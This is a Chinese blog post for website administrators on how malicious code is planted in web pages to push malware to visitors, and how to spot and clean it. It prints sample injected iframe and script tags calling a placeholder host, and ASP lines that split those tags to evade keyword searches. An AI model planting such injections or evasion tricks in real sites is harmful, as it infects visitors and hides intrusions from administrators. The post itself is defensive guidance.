常见的网页挂马方法»

«如何让网页变成黑白色

     所谓网页挂马就是在网页中插入恶意的Iframe或Script代码抑或其它恶意代码，来达到下载恶意病毒到客户端或其它非正规竞争的行为。 互联网上病毒的传播最大的途径就是通过网页挂马传播，当用户浏览了带有恶意下载病毒代码的网页的时候，病毒就不知不觉的下载到了你的电脑上。

    一个传统的挂马流程

    很明显，如果一个网站的流量相当大的时候，这个木马的传播范围和速度是很难以想像的。不过随着各类杀毒软件已经都加入了网页挂马检查，就算网页被挂马，用户端的杀毒软件也会很及时的提醒并阻止木马程序的下载。不过始终是先有病毒再有杀毒软件，或许杀毒软件能阻止和发现以往的旧病毒，但是如果最新型的病毒新到连它们的病毒库中都还没有的时候，那用户也就只有等着遭殃了。所以作为网站的管理者，石头认为应该有一双能及时识别和发现挂马的眼睛，及时清除网页的恶意代码给用户一个安全的浏览环境。

    大多时候，网页被挂马是可以一眼从网页的源代码中发现的。源代码的顶部或底部往往出现类似以下结构的代码：

<iframe src="http://xxx.com/swf.htm" height="0" width='0"></iframe>

<script src="http://xxx.com/tj.js"></script>

    这种挂马往往存在于网站的包含文件或模板文件中，因为只用一次插入就可以在所有调用这个文件的网页中实现。这种挂马的清除也会比较好做，直接找到这个代码再删除就可以了。但是聪明的入侵者不会就这样挂了马就闪，他会在你的网站中留下一个后门，方便下次再来。

    留下后门的方式比较多，包括上传shell（可以控制网站文件的小程序）、植入一句话木马、服务器端做免杀灰鸽子等等。这样做的最终目的就是达到随时可以操纵你的网站，就算你清除了挂马的代码，入侵者又能想加就加上。所以如果你的网站最被挂马了，石头建议你对网站的所有文件都进行一次彻底的检查，如果你不会可以找这方面的专业人士或者联系你的服务商运行相关的查杀工具。

    而也有另外一种入侵者，他们插入木马的方式与一般挂马会有所不同。他们知道插入比较有特征的代码会很熟悉被清除，会很容易会用关键字找到。所以他们会对代码和程序做一些小小的改动，让你很难找到被挂的恶意代码，这种隐藏挂马的方式最让人头疼，因为它往往挂得很有尝试，站长很难通过基本文件排查的方式来发现，除非你对所有的文件都打开检查或者重装程序，否则如果一套程序有几百个文件，你就一个一个的去找吧。

    这种挂马的入侵者往往对这套程序的结构相当熟悉，他们会把代码放在被调用的最深的一个文件里，比如：

 <!-- 首页default.asp-->

<!--#include file="inc/function.asp" -->

 <!-- inc/function.asp-->

<!--#include file="../function/basic.asp" -->

 <!-- function/basic.asp-->

<!--#include file="config/config1.asp" -->

...

    可以看到，程序中复杂的包含文件已经让人看到头疼，入侵者就会利用这个把木马植入到调用得最深的那个文件里，并且在代码上再动一些手脚，比如：

 <%
Response.Write("<scr"&"ipt src="&http://x&"x."&"x.com/"&"tj.js"&"></script>") '防止被关键字搜索 
%>

或

<%
Response.Write("<ifr"&"iame src="&"xx"&"x.com"&"/swf"&".htm"&") '防止被关键字搜索 
%>

    不过这种方式往往会利用在不直接输出的文件里，利用于JS调用的ASP文件中会更有效果，不仅从源代码中查不出来，就算查出来了，如果代码分割得过细，找也够你找的了。

    所以石头认为，在目前这个病毒肆虐的互联网中，再安全的系统或程序也有可能被攻破，做为网站管理者，除了对网站的源代码要相当敏感以外，还要随时关注程序的漏洞以及做好程序的安全备份，必要时恢复程序文件是最快的选择。